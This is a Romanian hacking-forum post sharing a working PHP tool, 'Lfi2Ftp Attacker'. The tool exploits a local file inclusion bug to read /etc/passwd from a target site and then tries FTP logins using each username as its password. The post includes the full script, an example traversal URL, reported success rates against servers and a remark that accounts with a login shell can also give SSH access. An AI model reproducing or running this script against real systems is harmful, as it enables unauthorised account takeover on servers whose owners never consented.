Jump to content
Guest Kenpachi

[RST] LFI To FTP Attacker.

Recommended Posts

Guest Kenpachi

Dupa cum spune numele acest script a fost creat pentru a exploata bugul numit Local File Inclusin.

Utilizare:

1. Remote Mode

se ia un site vulnerabil LFI ex. :


[url]http://www.rstcenter.com/index.php?page=../../../../../etc/passwd%00[/url]

se deschide scriptul se bifeaza Remote Mode, se introduce websiteul (trebuie sa aibe http:// in fata pentru ca mi'a fost lene sa ii introduc eu)

si se apasa butonul. Scriptul citeste userii din /etc/passwd de pe serverul in cauza si ataca ftp'ul cu acesti useri si parola aceeasi cu userul.

2.Local Mode

se bifeaza local mode si se apasa butonul. La fel ca la remote mode va citii userii de aceasta data de pe serverul local si il va ataca prin ftp.

Rata de succes per servere : 70% (din 10 servere atacate cu ftp enabled pe 7 din ele va gasi user bun)

Rata de succes per server : 1-2% (va gasi 1-2 usere bune pe un server la fiecare 100)

Rata de noroc chior (20-30%) : din 10 usere valide per ftp 2-3 au si shell access pe ssh.

Scriptul in cauza :


<title>Lfi2Ftp Attacker</title>
<?
if($_POST[mode] == 'local'){
echo 'ikuze !!
';flush();
$ulist = file('/etc/passwd');
$i = 0;
foreach($ulist as $line){
$user = explode(':', $line);
$user = trim($user[0]);
$resu = strrev($user);


$con = ftp_connect("127.0.0.1");
$try1 = @ftp_login($con, $user, $user);

if ((!$con) || (!$try1)) {
flush();
} else {
echo '<font color=green>'.$user.' - '.$user.'</font>';if(!strstr($line, 'nologin')){echo ' SHELL ACCESS ALLOWED !!!';}echo '
';flush();
++$i;
}
ftp_close($con);flush();
}

echo $i.' users bankai\'d';

}elseif($_POST[mode] == 'remote'){
echo 'ikuze !!
';flush();
$host = explode('http://', $_POST[url]);
$host = $host[1];
$host = explode('/', $host);
$host = $host[0];
echo 'Host: '.$host.'
';
flush();

$ulist = file($_POST[url]);
$i = 0;

foreach($ulist as $line){
if(strstr($line, ':')){
$user = explode(':', trim($line));
$user = trim($user[0]);


$con = ftp_connect($host);
$try1 = @ftp_login($con, $user, $user);

if ((!$con) || (!$try1)) {
echo '[b][FTP] - FAILED<font color=red>'.$user.' - '.$user.'</font>
[/b]';flush();
} else {

echo '[b][FTP] - FOUND<font color=green>'.$user.' - '.$user.'</font>
[/b]';flush();
++$i;
}
ftp_close($con);
flush();
}
}

echo $i.' users bankai\'d';

}else{?>
<form method=post action="">
<input type=radio name=mode value="local">[b]Local Mode
<input type=radio name=mode value="remote">Remote Mode

<input type=text maxlength=10000 size=30 name=url>

<input type=submit value="BAN KAI">

<?}?>

Nota: Stiu ca scriptul e foarte simplu si 9 din 10 useri puteati sa il faceti(/irony) dar nu l'ati facut asa ca l'am facut eu.

Link to comment
Share on other sites

Guest Kenpachi

o folosesc foarte des pentru explodeuri mai complicate ... aici e o relicva de la versiunea mea care incearca si cu userul scris de la cap la coada ca parola.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...